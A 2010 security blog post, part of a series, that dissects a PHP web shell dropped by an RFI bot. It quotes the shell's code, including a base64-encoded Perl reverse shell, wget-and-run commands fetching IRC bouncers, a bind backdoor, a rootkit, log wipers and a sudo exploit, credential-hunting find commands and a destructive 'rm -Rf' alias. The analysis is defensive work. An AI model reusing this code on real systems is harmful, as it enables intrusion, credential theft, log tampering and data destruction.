Irregular Expressions

Aug 21 2010   12:26AM GMT

Casper RFI crack bot – Part 4

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

sh.txt

This one also looks juicy!

Another php,

<?php
$sh_id = “Q2FTcEVyX0thRUB5YWhPTy5jT20=”;
$sh_ver = “0.0 01.01.2010″;
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = “http://xxxxxx.ru/config/”;
$html_start = ”.
‘<html><head>
<title>’.getenv(“HTTP_HOST”).’ – ‘.$sh_name.'</title>
<style type=”text/css”>
<!–

What are you up to with this one?

We have lots of toys to play with.

//Authentication
$login = "";
$pass = "";
$md5_pass = ""; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass).
$host_allow = array("*"); //Contoh: array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted Area"; //Pesan HTTP-Auth
$accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
$gzipencode = TRUE;
$updatenow = FALSE; //Jika TRUE, update shell sekarang.
$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";
$c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
//$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
//$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
$filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses.
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$log_email = "xxxxx_xxx@yahoo.com"; //email untuk pengiriman log.
$sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
$sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies.
$sess_cookie = "c99shvars"; //Nama variabel Cookie
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste
$hexdump_lines = 8;
$hexdump_rows = 24;
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
  $disablefunc = str_replace(" ","",$disablefunc);
  $disablefunc = explode(",",$disablefunc);
}

A few functions on checking and reporting disk usage..

Now this is worth tracking down.

//milw0rm search
$Lversion = php_uname(r);
$OSV = php_uname(s);
if(eregi("Linux",$OSV)) {
  $Lversion=substr($Lversion,0,6);
  $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
} else {
  $Lversion=substr($Lversion,0,3);
  $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
}
//End of milw0rm search

I wish milw0rm was still around so we could see what those are for :(

Here is a few things that are encrypted.

$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7
DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0k
QVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGll
KCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsN
CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+
JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3Rl
bSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4i
Ow0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

And a few others, no point in sharing :)

We are sure reporting back for a lot of things.

  $cmdaliases = array(
    array("", "ls -al"),
    array("Find all suid files", "find / -type f -perm -04000 -ls"),
    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
    array("Find config* files", "find / -type f -name \"config*\""),
    array("Find config* files in current dir", "find . -type f -name \"config*\""),
    array("Find all writable folders and files", "find / -perm -2 -ls"),
    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
    array("Find all writable folders", "find / -type d -perm -2 -ls"),
    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
    array("Find all service.pwd files", "find / -type f -name service.pwd"),
    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
    array("Find all .bash_history files", "find / -type f -name .bash_history"),
    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
    array("List file attributes on a Linux second extended file system", "lsattr -va"),
    array("Show opened ports", "netstat -an | grep -i listen")
  );

OK now this is nice!

  $cmdaliases2 = array(
    array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tar.gz;tar -zxf fx.tar.gz"),
    array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tar.gz;tar -zxf fxb.tar.gz"),
    array("-----",""),
    array("Logged in users","w"),
    array("Last to connect","lastlog"),
    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
    array("CPU Info","cat /proc/version /proc/cpuinfo"),
    array("Is gcc installed ?","locate gcc"),
    array("Format box (DANGEROUS)","rm -Rf"),
    array("-----",""),
    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
    array("Run WIPELOGS PT3","./zap2"),
    array("-----",""),
    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
    array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"),
    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
  );

Looking for a few more things. We pull down some log wipers, from packetstorm, and grab RatHole 1.2 from the same place, and a local sudo exploit.

This is a big one, I will have to continue this tomorrow.

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: